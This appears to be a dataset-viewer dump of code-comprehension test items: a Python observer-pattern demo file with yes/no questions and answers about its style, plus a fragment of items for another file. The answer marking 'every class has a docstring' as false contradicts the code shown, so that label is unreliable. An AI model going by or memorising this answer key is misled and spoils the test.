"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer":... | 3 | cirq/contrib/svg/svg_test.py | lilies/Cirq |
class Publisher:
    """Subject in the observer pattern.

    Keeps a list of subscribed observers and, on notify(), calls each
    observer's ``notify(publisher)`` method.
    """

    def __init__(self):
        self.observers = []

    def add(self, observer):
        """Subscribe *observer*; report (don't raise) on a duplicate add."""
        if observer not in self.observers:
            self.observers.append(observer)
        else:
            print('Failed to add: {}'.format(observer))

    def remove(self, observer):
        """Unsubscribe *observer*; report (don't raise) if it is unknown."""
        try:
            self.observers.remove(observer)
        except ValueError:
            print('Failed to remove: {}'.format(observer))

    def notify(self):
        """Notify every subscribed observer, in subscription order.

        Fixed: the original built a throwaway list via a comprehension used
        purely for its side effects; a plain loop states the intent.
        """
        for observer in self.observers:
            observer.notify(self)
class DefaultFormatter(Publisher):
    """A named publisher holding an integer payload.

    Every assignment to ``data`` notifies observers — even when the new
    value is rejected, so observers always see the current state.
    """

    def __init__(self, name):
        super().__init__()
        self.name = name
        self._data = 0

    def __str__(self):
        return "{}: '{}' has data = {}".format(type(self).__name__, self.name, self._data)

    @property
    def data(self):
        """Current integer payload."""
        return self._data

    @data.setter
    def data(self, new_value):
        # Coerce to int; on failure keep the old value but still notify.
        try:
            self._data = int(new_value)
        except ValueError as e:
            print('Error: {}'.format(e))
        self.notify()
class HexFormatter:
    """Observer that prints the publisher's data in hexadecimal."""

    def notify(self, publisher):
        message = "{}: '{}' has now hex data = {}".format(
            type(self).__name__, publisher.name, hex(publisher.data))
        print(message)
class BinaryFormatter:
    """Observer that prints the publisher's data in binary."""

    def notify(self, publisher):
        message = "{}: '{}' has now bin data = {}".format(
            type(self).__name__, publisher.name, bin(publisher.data))
        print(message)
def main():
    """Demo: wire formatters to a publisher and drive a series of updates."""
    formatter = DefaultFormatter('test1')
    print(formatter)
    print()

    hex_obs = HexFormatter()
    formatter.add(hex_obs)
    formatter.data = 3
    print(formatter)
    print()

    bin_obs = BinaryFormatter()
    formatter.add(bin_obs)
    formatter.data = 21
    print(formatter)
    print()

    formatter.remove(hex_obs)
    formatter.data = 40
    print(formatter)
    print()

    # Error paths: double-remove, duplicate add, non-numeric assignment.
    formatter.remove(hex_obs)
    formatter.add(bin_obs)
    formatter.data = 'hello'
    print(formatter)
    print()

    # Floats are truncated by int() in the setter.
    formatter.data = 15.8
    print(formatter)


if __name__ == '__main__':
    main()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
}... | 3 | Module 3/9324OS_13_code/old/observer.py | real-slim-chadi/Python_Master-the-Art-of-Design-Patterns |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.